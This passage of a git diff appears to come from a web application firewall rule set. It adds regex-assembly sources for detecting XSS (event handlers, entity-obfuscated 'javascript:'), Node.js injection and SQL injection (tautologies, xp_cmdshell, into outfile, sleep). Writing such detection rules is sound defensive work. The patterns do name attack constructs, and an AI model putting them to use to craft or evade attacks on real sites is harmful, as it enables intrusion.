\xe2\x93[\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4] + ##! ⓿,⓵,⓶,⓷,⓸,⓹,⓺,⓻,⓼,⓽,⓾ + \xe2\x93[\xbf\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe] + ##! ideographic full stop: 。 + \xe3\x80\x82 + ##!=< enclosed-alnums + ##!< + + ##! an IP could start with digits and dots + ##!> assemble + [\d.]{0,11} + ##!=> + ##!> assemble + ##!=> enclosed-alnums + ##!< + ##!=> + ##! match all for capture + + + ##!=> + ##!< +##!< diff --git a/regex-assembly/934140.ra b/regex-assembly/934140.ra new file mode 100644 index 0000000000..ec33ac5624 --- /dev/null +++ b/regex-assembly/934140.ra @@ -0,0 +1,4 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +\@\{.*\} diff --git a/regex-assembly/934150.ra b/regex-assembly/934150.ra new file mode 100644 index 0000000000..22786be6e3 --- /dev/null +++ b/regex-assembly/934150.ra @@ -0,0 +1,4 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +Process\s*\.\s*spawn\s*\( diff --git a/regex-assembly/934160.ra b/regex-assembly/934160.ra new file mode 100644 index 0000000000..f62d06d9c0 --- /dev/null +++ b/regex-assembly/934160.ra @@ -0,0 +1,9 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Match while(true) like loops +##!> assemble +##!^ while\s*\([\s(]* +##!$ .*\) + ##!> include js-truthy-values +##!< diff --git a/regex-assembly/934170.ra b/regex-assembly/934170.ra new file mode 100644 index 0000000000..8ea60176c4 --- /dev/null +++ b/regex-assembly/934170.ra @@ -0,0 +1,10 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!^ ^ + +##!> assemble + data: + ##!=> + ##!> include charset-specification-no-anchors +##!< diff --git a/regex-assembly/941130.ra b/regex-assembly/941130.ra new file mode 100644 index 0000000000..422c34e66c --- /dev/null +++ b/regex-assembly/941130.ra @@ -0,0 +1,17 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i +##!^ . +##!$ \b + +\bxlink:href +\bxhtml +\bxmlns +!ENTITY\s+(?:\S+|%\s+\S+)\s+SYSTEM +!ENTITY\s+(?:\S+|%\s+\S+)\s+PUBLIC +\bdata:text/html +\bformaction +@import +;base64 +\bpattern\b.*?= diff --git a/regex-assembly/941160.ra b/regex-assembly/941160.ra new file mode 100644 index 0000000000..7d58620262 --- /dev/null +++ b/regex-assembly/941160.ra @@ -0,0 +1,371 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +##!> assemble + <[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*? + ##!=< js-prop-prefix +##!< + +##!> assemble + s\W*?c\W*?r\W*?i\W*?p\W*?t + f\W*?o\W*?r\W*?m + d\W*?i\W*?a\W*?l\W*?o\W*?g + s\W*?t\W*?y\W*?l\W*?e + s\W*?v\W*?g + m\W*?a\W*?r\W*?q\W*?u\W*?e\W*?e + l\W*?i\W*?n\W*?k[^>\w] + o\W*?b\W*?j\W*?e\W*?c\W*?t[^>\w] + e\W*?m\W*?b\W*?e\W*?d[^>\w] + a\W*?p\W*?p\W*?l\W*?e\W*?t[^>\w] + p\W*?a\W*?r\W*?a\W*?m[^>\w] + i?\W*?f\W*?r\W*?a\W*?m\W*?e[^>\w] + b\W*?a\W*?s\W*?e[^>\w] + b\W*?o\W*?d\W*?y[^>\w] + m\W*?e\W*?t\W*?a[^>\w] + i\W*?m\W*?a?\W*?g\W*?e?[^>\w] + v\W*?i\W*?d\W*?e\W*?o[^>\w] + a\W*?u\W*?d\W*?i\W*?o[^>\w] + b\W*?i\W*?n\W*?d\W*?i\W*?n\W*?g\W*?s[^>\w] + s\W*?e\W*?t[^>\w] + a\W*?n\W*?i\W*?m\W*?a\W*?t\W*?e[^>\w] + ##!=< js-payloads +##!< + + +##!> assemble + (?:<\w.*[\s/]|['\"](?:.*[\s/])?) + ##!=< html-properties-prefix +##!< + +##!> assemble + background + formaction + lowsrc + onabort + onactivate + onadapteradded + onaddtrack + onafterprint + onafterscriptexecute + onafterupdate + onalerting + onanimationcancel + onanimationend + onanimationiteration + onanimationstart + onantennastatechange + onappcommand + onaudioend + onaudioprocess + onaudiostart + onauxclick + onbeforeactivate + onbeforecopy + onbeforecut + onbeforedeactivate + onbeforeeditfocus + onbeforeinput + onbeforepaste + onbeforeprint + onbeforescriptexecute + onbeforetoggle + onbeforeunload + onbeforeupdate + onbegin + onbeginEvent + onblocked + onblur + onbounce + onboundary + onbroadcast + onbusy + oncached + oncallschanged + oncanplay + oncanplaythrough + oncardstatechange + oncellchange + oncfstatechange + onchange + onchargingchange + onchargingtimechange + onchecking + onclick + onclose + oncommand + oncommandupdate + oncomplete + oncompositionend + oncompositionstart + oncompositionupdate + onconnected + onconnecting + oncontextmenu + oncontrolselect + oncopy + oncuechange + oncut + ondataavailable + ondatachange + ondataerror + ondatasetchanged + ondatasetcomplete + ondblclick + ondeactivate + ondeliveryerror + ondeliverysuccess + ondevicefound + ondevicelight + ondevicemotion + ondeviceorientation + ondeviceproximity + ondialing + ondisabled + ondischargingtimechange + ondisconnected + ondisconnecting + ondomactivate + ondomattrmodified + ondomcharacterdatamodified + ondomfocusin + ondomfocusout + ondommousescroll + ondomnodeinserted + ondomnodeinsertedintodocument + ondomnoderemoved + ondomnoderemovedfromdocument + ondomsubtreemodified + ondownloading + ondragdrop + ondragend + ondragenter + ondragexit + ondraggesture + ondragleave + ondragover + ondragstart + ondrop + ondurationchange + onemptied + onenabled + onend + onended + onendEvent + onenter + onerror + onerrorupdate + onexit + onfailed + onfilterchange + onfinish + onfocus + onfocusin + onfocusout + onformchange + onforminput + onfullscreenchange + ongamepadaxismove + ongamepadbuttondown + ongamepadbuttonup + ongamepadconnected + ongamepaddisconnected + onget + onhashchange + onheadphoneschange + onheld + onhelp + onholding + onicccardlockerror + oniccinfochange + onincoming + oninput + oninvalid + onkeydown + onkeypress + onkeyup + onlevelchange + onload + onloadeddata + onloadedmetadata + onloadend + onloadstart + onlosecapture + only + onmark + onmessage + onmousedown + onmouseenter + onmouseleave + onmousemove + onmouseout + onmouseover + onmouseup + onmousewheel + onmove + onmoveend + onmovestart + onmozafterpaint + onmozaudioavailable + onmozbeforeresize + onmozedgeuicanceled + onmozedgeuicompleted + onmozedgeuistarted + onmozfullscreenchange + onmozfullscreenerror + onmozmagnifygesture + onmozmagnifygesturestart + onmozmagnifygestureupdate + onmozmousehittest + onmozmousepixelscroll + onmoznetworkdownload + onmoznetworkupload + onmozorientationchange + onmozpointerlockchange + onmozpointerlockerror + onmozpresstapgesture + onmozrotategesture + onmozrotategesturestart + onmozrotategestureupdate + onmozscrolledareachanged + onmozswipegesture + onmozswipegestureend + onmozswipegesturestart + onmozswipegestureupdate + onmoztapgesture + onmoztimechange + onnomatch + onnoupdate + onobsolete + onoffline + ononline + onopen + onoverflow + onoverflowchanged + onpagehide + onpageshow + onpaint + onpaste + onpause + onplay + onplaying + onpointerdown + onpointerenter + onpointerleave + onpointermove + onpointerout + onpointerover + onpointerrawupdate + onpointerup + onpopstate + onpopuphidden + onpopuphiding + onpopupshowing + onpopupshown + onprogress + onpropertychange + onratechange + onreadystatechange + onreceived + onremovetrack + onrepeat + onrepeatEvent + onrequest + onreset + onresize + onresult + onresume + onresuming + onretrieving + onrowenter + onrowexit + onrowsdelete + onrowsinserted + onscroll + onscrollend + onsearch + onseekcomplete + onseeked + onseeking + onselect + onselectionchange + onselectstart + onsending + onsent + onset + onshow + onsoundend + onsoundstart + onspeechend + onspeechstart + onstalled + onstart + onstatechange + onstatuschanged + onstkcommand + onstksessionend + onstop + onsubmit + onsuccess + onsuspend + onsvgabort + onsvgerror + onsvgload + onsvgresize + onsvgscroll + onsvgunload + onsvgzoom + ontext + ontimeout + ontimeupdate + ontoggle + ontouchcancel + ontouchend + ontouchenter + ontouchleave + ontouchmove + ontouchstart + ontransitioncancel + ontransitionend + ontransitionrun + ontransitionstart + onunderflow + onunhandledrejection + onunload + onupdateready + onupgradeneeded + onuserproximity + onussdreceived + onversionchange + onvoicechange + onvolumechange + onwaiting + onwarning + onwebkitanimationend + onwebkitanimationiteration + onwebkitanimationstart + onwebkittransitionend + onwheel + onzoom + ping + src + style + ##!=< html-properties +##!< + +##!> assemble + [\s\x08]*?= + ##!=< html-properties-end +##!< + +##!> assemble + ##!=> js-prop-prefix + ##!=> js-payloads +##!< + +##!> assemble + ##!=> html-properties-prefix + ##!=> html-properties + ##!=> html-properties-end +##!< diff --git a/regex-assembly/941210.ra b/regex-assembly/941210.ra new file mode 100644 index 0000000000..46f9bc6677 --- /dev/null +++ b/regex-assembly/941210.ra @@ -0,0 +1,231 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! This rule tries to match all the possible ways to write 'javascript' using +##! html entities, and javascript escape sequences. +##! See https://html.spec.whatwg.org/multipage/named-characters.html#named-character-references for examples. +##! And https://www.w3schools.com/charsets/ref_html_ascii.asp for the list of +##! all the possible html entities. + +##!+ i + +##! Matched order is sequential: we first match 'j', then 'a', then 'v', etc. + +##!> define html_entity_hex_prefix �* +##!> define html_entity_dec_prefix �* +##!> define whitespaces [\t\n\r] + +##! html_encoded_whitespace is a list of all the possible ways to write an encoded whitespace +##!> assemble + ##! canonical form + {{whitespaces}} + ##! alternative forms + ##!> assemble + ##! 09 horizontal tab + ##! 10 line feed + ##! 13 carriage return + ##! 0A line feed (hex) + ##! 0D carriage return (hex) + {{html_entity_dec_prefix}}9;? + {{html_entity_dec_prefix}}10;? + {{html_entity_dec_prefix}}13;? + {{html_entity_hex_prefix}}A;? + {{html_entity_hex_prefix}}D;? + &tab; + &newline; + ##!=> + ##!< + ##!=> + * + ##!=< html_encoded_whitespace +##!< + +##! all the possible ways to end the word 'javascript', plus whitespaces +##!> assemble + ##! canonical form + : + ##! alternative forms + ##!> assemble + ##! 58 : colon + ##! 3A : colon (hex) + {{html_entity_dec_prefix}}58;? + {{html_entity_hex_prefix}}3A;? + : + ##!< + ##!=> + . + ##!=< end_javascript +##!< + +##! all the possible ways to write 'j', plus whitespaces +##! canonical form +j +##! alternative forms +##!> assemble + ##! J 74 uppercase J + ##! j 106 lowercase j + ##! J 4A uppercase J (hex) + ##! j 6A lowercase j (hex) + {{html_entity_dec_prefix}}74; + {{html_entity_dec_prefix}}106; + {{html_entity_hex_prefix}}4A; + {{html_entity_hex_prefix}}6A; +##!< +##!=> +##!=> html_encoded_whitespace + +##! all the possible ways to write 'a', plus whitespaces +##!> assemble + ##! canonical form + a + ##! alternative forms + ##!> assemble + ##! A 65 uppercase A + ##! a 97 lowercase a + ##! A 41 uppercase A (hex) + ##! a 61 lowercase a (hex) + {{html_entity_dec_prefix}}65; + {{html_entity_dec_prefix}}97; + {{html_entity_hex_prefix}}41; + {{html_entity_hex_prefix}}61; + ##!< + ##!=> + ##!=> html_encoded_whitespace + ##!=< all_possible_ways_to_write_a +##!< + +##!=> all_possible_ways_to_write_a + +##! all the possible ways to write 'v', plus whitespaces +##! canonical form +v +##! alternative forms +##!> assemble + ##! V 86 uppercase V + ##! V 56 uppercase V (hex) + ##! v 118 lowercase v + ##! v 76 lowercase v (hex) + {{html_entity_dec_prefix}}86; + {{html_entity_hex_prefix}}56; + {{html_entity_dec_prefix}}118; + {{html_entity_hex_prefix}}76; +##!< +##!=> +##!=> html_encoded_whitespace + +##!=> all_possible_ways_to_write_a + +##! all the possible ways to write 's', plus whitespaces +##! canonical form +s +##! alternative forms +##!> assemble + ##! s 115 lowercase s + ##! s 73 lowercase s (hex) + ##! S 83 uppercase S + ##! S 53 uppercase S (hex) + {{html_entity_dec_prefix}}115; + {{html_entity_hex_prefix}}73; + {{html_entity_dec_prefix}}83; + {{html_entity_hex_prefix}}53; +##!< +##!=> +##!=> html_encoded_whitespace + +##!=> + +##! all the possible ways to write 'c', plus whitespaces +##! canonical form +c +##! alternative forms +##!> assemble + ##! c 63 lowercase C (hex) + ##! c 99 lowercase c + ##! C 43 uppercase c (hex) + ##! C 67 uppercase C + {{html_entity_hex_prefix}}63; + {{html_entity_dec_prefix}}99; + {{html_entity_hex_prefix}}43; + {{html_entity_dec_prefix}}67; +##!< +##!=> +##!=> html_encoded_whitespace + +##!=> + +##! all the possible ways to write 'r', plus whitespaces +##! canonical form +r +##! alternative forms +##!> assemble + ##! r 72 lowercase R (hex) + ##! r 114 lowercase r + ##! r 52 uppercase r (hex) + ##! R 82 uppercase R + {{html_entity_hex_prefix}}72; + {{html_entity_dec_prefix}}114; + {{html_entity_hex_prefix}}52; + {{html_entity_dec_prefix}}82; +##!< +##!=> +##!=> html_encoded_whitespace + +##!=> + +##! all the possible ways to write 'i', plus whitespaces +##! canonical form +i +##! alternative forms +##!> assemble + ##! i 69 lowercase i (hex) + ##! i 105 lowercase i + ##! I 49 uppercase i (hex) + ##! I 73 uppercase I + {{html_entity_hex_prefix}}69; + {{html_entity_dec_prefix}}105; + {{html_entity_hex_prefix}}49; + {{html_entity_dec_prefix}}73; +##!< +##!=> +##!=> html_encoded_whitespace + +##!=> + +##! all the possible ways to write 'p', plus whitespaces +##! canonical form +p +##! alternative forms +##!> assemble + ##! p 70 lowercase p (hex) + ##! p 112 lowercase p + ##! P 50 uppercase p (hex) + ##! P 80 uppercase P + {{html_entity_hex_prefix}}70; + {{html_entity_dec_prefix}}112; + {{html_entity_hex_prefix}}50; + {{html_entity_dec_prefix}}80; +##!< +##!=> +##!=> html_encoded_whitespace + +##!=> + +##! all the possible ways to write 't', plus whitespaces +##! canonical form +t +##! alternative forms +##!> assemble + ##! t 74 lowercase t (hex) + ##! t 116 lowercase t + ##! T 54 uppercase t (hex) + ##! T 84 uppercase T + {{html_entity_hex_prefix}}74; + {{html_entity_dec_prefix}}116; + {{html_entity_hex_prefix}}54; + {{html_entity_dec_prefix}}84; +##!< +##!=> +##!=> html_encoded_whitespace +##!=> + +##!=> end_javascript diff --git a/regex-assembly/941220.ra b/regex-assembly/941220.ra new file mode 100644 index 0000000000..36975fc185 --- /dev/null +++ b/regex-assembly/941220.ra @@ -0,0 +1,212 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! This rule tries to match all the possible ways to write 'vbscript' using +##! html entities, and javascript escape sequences. +##! See https://html.spec.whatwg.org/multipage/named-characters.html#named-character-references for examples. +##! And https://www.w3schools.com/charsets/ref_html_ascii.asp for the list of +##! all the possible html entities. + +##!+ i + +##! Matched order is sequential: we first match 'v', then 'b', then 's', etc. + +##!> define html_entity_hex_prefix �* +##!> define html_entity_dec_prefix �* +##!> define whitespaces [\t\n\r] + +##! html_encoded_whitespace is a list of all the possible ways to write an encoded whitespace +##!> assemble + ##! canonical form + {{whitespaces}} + ##! alternative forms + ##!> assemble + ##! 09 horizontal tab + ##! 10 line feed + ##! 13 carriage return + ##! 0A line feed (hex) + ##! 0D carriage return (hex) + {{html_entity_dec_prefix}}9;? + {{html_entity_dec_prefix}}10;? + {{html_entity_dec_prefix}}13;? + {{html_entity_hex_prefix}}A;? + {{html_entity_hex_prefix}}D;? + &tab; + &newline; + ##!=> + ##!< + ##!=> + * + ##!=< html_encoded_whitespace +##!< + +##! all the possible ways to end the word 'vbscript', plus whitespaces +##!> assemble + ##! canonical form + : + ##! alternative forms + ##!> assemble + ##! 58 : colon + ##! 3A : colon (hex) + {{html_entity_dec_prefix}}58;? + {{html_entity_hex_prefix}}3A;? + : + ##!< + ##!=> + . + ##!=< end_vbscript +##!< + +##!=> +##! all the possible ways to write 'v', plus whitespaces +##! canonical form +v +##! alternative forms +##!> assemble + ##! v 118 lowercase v + ##! v 76 lowercase v (hex) + ##! V 86 uppercase V + ##! V 56 uppercase V (hex) + {{html_entity_dec_prefix}}118; + {{html_entity_hex_prefix}}76; + {{html_entity_dec_prefix}}86; + {{html_entity_hex_prefix}}56; +##!< +##!=> +##!=> html_encoded_whitespace + +##!=> + +##! all the possible ways to write 'b', plus whitespaces +##! canonical form +b +##! alternative forms +##!> assemble + ##! b 98 lowercase b + ##! b 62 lowercase b (hex) + ##! B 66 uppercase B + ##! B 42 uppercase B (hex) + {{html_entity_dec_prefix}}98; + {{html_entity_hex_prefix}}62; + {{html_entity_dec_prefix}}66; + {{html_entity_hex_prefix}}42; +##!< +##!=> +##!=> html_encoded_whitespace + +##!=> + +##! all the possible ways to write 's', plus whitespaces +##! canonical form +s +##! alternative forms +##!> assemble + ##! s 115 lowercase s + ##! s 73 lowercase s (hex) + ##! S 83 uppercase S + ##! S 53 uppercase S (hex) + {{html_entity_dec_prefix}}115; + {{html_entity_hex_prefix}}73; + {{html_entity_dec_prefix}}83; + {{html_entity_hex_prefix}}53; +##!< +##!=> +##!=> html_encoded_whitespace + +##!=> + +##! all the possible ways to write 'c', plus whitespaces +##! canonical form +c +##! alternative forms +##!> assemble + ##! c 63 lowercase C (hex) + ##! c 99 lowercase c + ##! C 43 uppercase c (hex) + ##! C 67 uppercase C + {{html_entity_hex_prefix}}63; + {{html_entity_dec_prefix}}99; + {{html_entity_hex_prefix}}43; + {{html_entity_dec_prefix}}67; +##!< +##!=> +##!=> html_encoded_whitespace + +##!=> + +##! all the possible ways to write 'r', plus whitespaces +##! canonical form +r +##! alternative forms +##!> assemble + ##! r 72 lowercase R (hex) + ##! r 114 lowercase r + ##! r 52 uppercase r (hex) + ##! R 82 uppercase R + {{html_entity_hex_prefix}}72; + {{html_entity_dec_prefix}}114; + {{html_entity_hex_prefix}}52; + {{html_entity_dec_prefix}}82; +##!< +##!=> +##!=> html_encoded_whitespace + +##!=> + +##! all the possible ways to write 'i', plus whitespaces +##! canonical form +i +##! alternative forms +##!> assemble + ##! i 69 lowercase i (hex) + ##! i 105 lowercase i + ##! I 49 uppercase i (hex) + ##! I 73 uppercase I + {{html_entity_hex_prefix}}69; + {{html_entity_dec_prefix}}105; + {{html_entity_hex_prefix}}49; + {{html_entity_dec_prefix}}73; +##!< +##!=> +##!=> html_encoded_whitespace + +##!=> + +##! all the possible ways to write 'p', plus whitespaces +##! canonical form +p +##! alternative forms +##!> assemble + ##! p 70 lowercase p (hex) + ##! p 112 lowercase p + ##! P 50 uppercase p (hex) + ##! P 80 uppercase P + {{html_entity_hex_prefix}}70; + {{html_entity_dec_prefix}}112; + {{html_entity_hex_prefix}}50; + {{html_entity_dec_prefix}}80; +##!< +##!=> +##!=> html_encoded_whitespace + +##!=> + +##! all the possible ways to write 't', plus whitespaces +##! canonical form +t +##! alternative forms +##!> assemble + ##! t 74 lowercase t (hex) + ##! t 116 lowercase t + ##! T 54 uppercase t (hex) + ##! T 84 uppercase T + {{html_entity_hex_prefix}}74; + {{html_entity_dec_prefix}}116; + {{html_entity_hex_prefix}}54; + {{html_entity_dec_prefix}}84; +##!< +##!=> +##!=> html_encoded_whitespace +##!=> + +##!=> end_vbscript diff --git a/regex-assembly/941390.ra b/regex-assembly/941390.ra new file mode 100644 index 0000000000..92288915a9 --- /dev/null +++ b/regex-assembly/941390.ra @@ -0,0 +1,16 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i +##!^ \b +##!$ \s*\( + +eval +settimeout +setinterval +new\s+Function +alert +atob +btoa +prompt +confirm diff --git a/regex-assembly/942120.ra b/regex-assembly/942120.ra new file mode 100644 index 0000000000..f12014ed10 --- /dev/null +++ b/regex-assembly/942120.ra @@ -0,0 +1,37 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +\!\= +\&\& +\|\| +>> +<< +>= +<= +<> +<=> +\bxor\b +\bregexp\b +regexp\s+binary +\bisnull\b +\brlike\b +rlike\s+binary +not\s+between\s+0\s+and +not\s+between\s+(?:(?:'[^']*')|(?:\"[^\"]*\"))\s+and\s+(?:(?:'[^']*')|(?:\"[^\"]*\")) +is\s+null +like\s+null +^in[+\s]*\([\s\d\"]+[^()]*\) +\Win[+\s]*\([\s\d\"]+[^()]*\) +<>\s+binary +\bcollate\W*?(?:U&)?[\"'`] +\bcollate\W+(?:binary|nocase|rtrim)\b +\bcollate\W+\w*?_ +\bnotnull\b +like\s+[\w]+\s+escape\b +\bilike\b +[<>=!]{1,2}\s*all\b +\blikelihood\s*\( +\bunlikely\s*\( +\blikely\s*\( diff --git a/regex-assembly/942130.ra b/regex-assembly/942130.ra new file mode 100644 index 0000000000..66beb373e9 --- /dev/null +++ b/regex-assembly/942130.ra @@ -0,0 +1,42 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +##! General comments: +##! +##! The idea behind this expressions is to capture simple logic based (un)equalities that +##! are used to quickly test SQL Logic that always returns TRUE (hence the term "SQL Tautology"). + +##! We also want to capture the left and right side, and compare for equality. +##! That's why you see below that some of the patterns include grouping explicitly + +##! Prefix: captures the initial part that will be matched on the right hand side of the logical construct. + +##!^ [\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*? + +##! These expressions try to match the logic using the operator, +##! so when the operator targets a TRUE operation, the initial match +##! should be present after the operator, logically meaning TRUE +##! +##! Examples: +##! '1' = '1' +##! 'f' like 'f' + +##! This one will also match the "equal" part of '<=' and '>=' +=[\s'\"`()]*?\b([\d\w]+)\b + +##! <=> NULL-safe equal to operator in MySQL +<=>[\s'\"`()]*?\b([\d\w]+)\b + +##! Like queries allow you to use wilcards: '%' + +like[\s'\"`()]*?\b([\d\w]+)\b +sounds\s+like[\s'\"`()]*?\b([\d\w]+)\b + +##! GLOB operator is used to match text values against a pattern +glob[\s'\"`()]*?\b([\d\w]+)\b + +##! String based regexp. These don't use % as wildcard. +rlike[\s'\"`()]*?\b([\d\w]+)\b +regexp[\s'\"`()]*?\b([\d\w]+)\b diff --git a/regex-assembly/942131.ra b/regex-assembly/942131.ra new file mode 100644 index 0000000000..d4ebdfd925 --- /dev/null +++ b/regex-assembly/942131.ra @@ -0,0 +1,42 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + + +##! General comments: +##! +##! The idea behind this expressions is to capture simple logic based (un)equalities that +##! are used to quickly test SQL Logic that always returns FALSE. + +##! Prefix: captures the initial part that will be unmatched on the right hand side of the logical construct. + +##!^ [\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*? + +##!+ i + +##! These expressions try to match the logic using the negative operator, +##! so when the operator targets a false operation, the initial match +##! should *not* be present after the operator, effectively meaning TRUE. +##! +##! Examples: +##! '1' <= '2' +##! 'a' not like 'b' +##! +##! SQL Comparison Operators: !=, <=, >=, <>, <, >, !>, !<, ^ + +\!=[\s'\"`()]*?\b([\d\w]+)\b +<>[\s'\"`()]*?\b([\d\w]+)\b +<[\s'\"`()]*?\b([\d\w]+)\b +\!<[\s'\"`()]*?\b([\d\w]+)\b +>[\s'\"`()]*?\b([\d\w]+)\b +\!>[\s'\"`()]*?\b([\d\w]+)\b +<=[\s'\"`()]*?\b([\d\w]+)\b +>=[\s'\"`()]*?\b([\d\w]+)\b +\^[\s'\"`()]*?\b([\d\w]+)\b + +is\s+not[\s'\"`()]*?\b([\d\w]+)\b +not\s+like[\s'\"`()]*?\b([\d\w]+)\b + +##! String based regexp. + +not\s+rlike[\s'\"`()]*?\b([\d\w]+)\b +not\s+regexp[\s'\"`()]*?\b([\d\w]+)\b diff --git a/util/regexp-assemble/regexp-942140.data b/regex-assembly/942140.ra similarity index 75% rename from util/regexp-assemble/regexp-942140.data rename to regex-assembly/942140.ra index 9ef24c9872..cd2551af3b 100644 --- a/util/regexp-assemble/regexp-942140.data +++ b/regex-assembly/942140.ra @@ -1,3 +1,9 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i +##!^ \b + database\W*\( db_name\W*\( information_schema\b diff --git a/regex-assembly/942150.ra b/regex-assembly/942150.ra new file mode 100644 index 0000000000..aaaf7ce8ff --- /dev/null +++ b/regex-assembly/942150.ra @@ -0,0 +1,146 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i +##!^ \b +##!$ \W*\( + +##! SQLite specific functions +json +json_[\w]+ +##! Extracted from docs with: +##! paths=("lang_corefunc.html" "lang_mathfunc.html" "lang_aggfunc.html"); declare items; for path in "${paths[@]}"; do items+=$(curl https://www.sqlite.org/$path -s | xmllint --html --xpath "//a[contains(@href,'func.html')]/text()" - 2>/dev/null | grep --color=never -Po "^[\w]+(?=\()"); done; echo "$items" | sort | uniq +abs +acos +acosh +asin +asinh +atan +atan2 +atanh +ceil +ceiling +changes +char +coalesce +cos +cosh +count +degrees +exp +floor +flooravg +format +glob +group_concat +hex +ifnull +iif +instr +last_insert_rowid +length +like +likelihood +likely +ln +load_extension +log +log10 +log2 +lower +lowerpi +ltrim +max +min +mod +nullif +pi +pow +power +printf +quote +radians +random +randomblob +replace +round +rtrim +sign +sin +sinh +soundex +sqlite_compileoption_get +sqlite_compileoption_used +sqlite_offset +sqlite_source_id +sqlite_version +sqrt +substr +substring +sum +tan +tanh +total +total_changes +trim +trunc +typeof +unicode +unlikely +upper +zeroblob + +##! Generic SQL functions +##! +##! Note: May contain overlap with the generated DBMS specific lists, but this guarantees +##! A minimum level of protection, even if one of the one-liners creates an unusual set. +##! Duplicates do not effect the final result of regexp-assemble. +abs +acos +avg +bin +cast +count +date +day +default +field +floor +format +hour +char +charset +chr +if +in +last +length +ln +local +log +max +min +minute +mod +month +now +password +pi +power +repeat +replace +reverse +right +round +second +sign +sleep +sum +tan +time +upper +user +values +version +week +year diff --git a/regex-assembly/942151.ra b/regex-assembly/942151.ra new file mode 100644 index 0000000000..611a28a1e9 --- /dev/null +++ b/regex-assembly/942151.ra @@ -0,0 +1,6 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +##!> include sql-injection-function-names diff --git a/regex-assembly/942152.ra b/regex-assembly/942152.ra new file mode 100644 index 0000000000..611a28a1e9 --- /dev/null +++ b/regex-assembly/942152.ra @@ -0,0 +1,6 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +##!> include sql-injection-function-names diff --git a/regex-assembly/942170.ra b/regex-assembly/942170.ra new file mode 100644 index 0000000000..6a24a4849e --- /dev/null +++ b/regex-assembly/942170.ra @@ -0,0 +1,25 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +##!> define one_or_more_whitespace \s+ +##!> define select_or_terminate (?:select|;){{one_or_more_whitespace}} + +##!> assemble + + ##! benchmark may be used to time how quickly MySQL processes the expression + {{select_or_terminate}}benchmark + + ##! conditional select + {{select_or_terminate}}if + + ##! sleep function + {{select_or_terminate}}sleep + ##!=> + + ##! function parameters + \s*?\(\s*?\(?\s*?\w+ + + ##!=> +##!< diff --git a/regex-assembly/942180.ra b/regex-assembly/942180.ra new file mode 100644 index 0000000000..d684e706dc --- /dev/null +++ b/regex-assembly/942180.ra @@ -0,0 +1,62 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +##!> define open-comment (?:/\*) +##!> define quotes [\"'`] +##!> define quotes-plus-digits [\d\"'`] +##!> define comment-suffix (?:--|#|{{open-comment}}|\{) +##! PB: Should comment-suffix also include "\*/" ? + +##!> define logical-operators or|xor|and +##!> define math-operators div +##!> define comparison-operators like|between +##!> define math-symbols [+<>=(),-] + +{{open-comment}}+{{quotes}}+\s?{{comment-suffix}}? + +##!> assemble + {{quotes}}\s* + ##!=> + ##! logical operators + or + xor + and + + ##! math operators + div + + ##! comparison operators + like + between + ##!=> + [\w\s-]+{{math-symbols}}\s*{{quotes-plus-digits}} + ##!=> +##!< + + +##!> assemble + {{quotes}} + ##!=> + [<>~]+ + \s*[^\w\s]?=\s* + \W*?[+=]+\W*? + ##!=> + {{quotes}} +##!< + +##!> assemble + {{quotes}} + ##!=> + \s*[!=|][\d\s!=+-]+.*?[\"'`(].*?$ + \s*[!=|][\d\s!=]+.*?\d+$ + \s*(?:like|print)\W+[\w\"'`(] + \s*; +##!< + +\d{{quotes}}\s+{{quotes}}\s+\d +^admin\s*?{{quotes}} +[\"'`\(\s]\s*?glob\W+[\w\"'`(] +\sis\s*?0\W +where\s[\s\w\.,-]+\s= diff --git a/regex-assembly/942190.ra b/regex-assembly/942190.ra new file mode 100644 index 0000000000..9353b13d67 --- /dev/null +++ b/regex-assembly/942190.ra @@ -0,0 +1,61 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +##!> define quotes [\"'`] + +##!> assemble + {{quotes}} + ##!=> + \s*!\s*[\"'`\w] + ##!> assemble + ;?\s* + ##!=> + having + select + ##!> assemble + union\b\s* + ##!=> + all + distinct + select + ##!< + ##!=> + \b\s*[^\s] + ##!< +##!< + +##!> assemble + \b + ##!=> + ##!> assemble + connection_id + current_user + database + schema + user + ##!=> + \s*?\( + ##!< + + exec\s+master\. + execute\s+master\. + from\W+information_schema\W + ##!> assemble + into[\s+]+ + ##!=> + dumpfile + outfile + ##!=> + \s*?{{quotes}} + ##!< + + select.*?\w?user\( + union\sselect\s@ + union[\w(\s]*?select +##!< + +\s*?exec.*?\Wxp_cmdshell +\s*?execute.*?\Wxp_cmdshell +\Wiif\s*?\( diff --git a/regex-assembly/942200.ra b/regex-assembly/942200.ra new file mode 100644 index 0000000000..0d0c35dd2b --- /dev/null +++ b/regex-assembly/942200.ra @@ -0,0 +1,40 @@ +##! Please refer to the 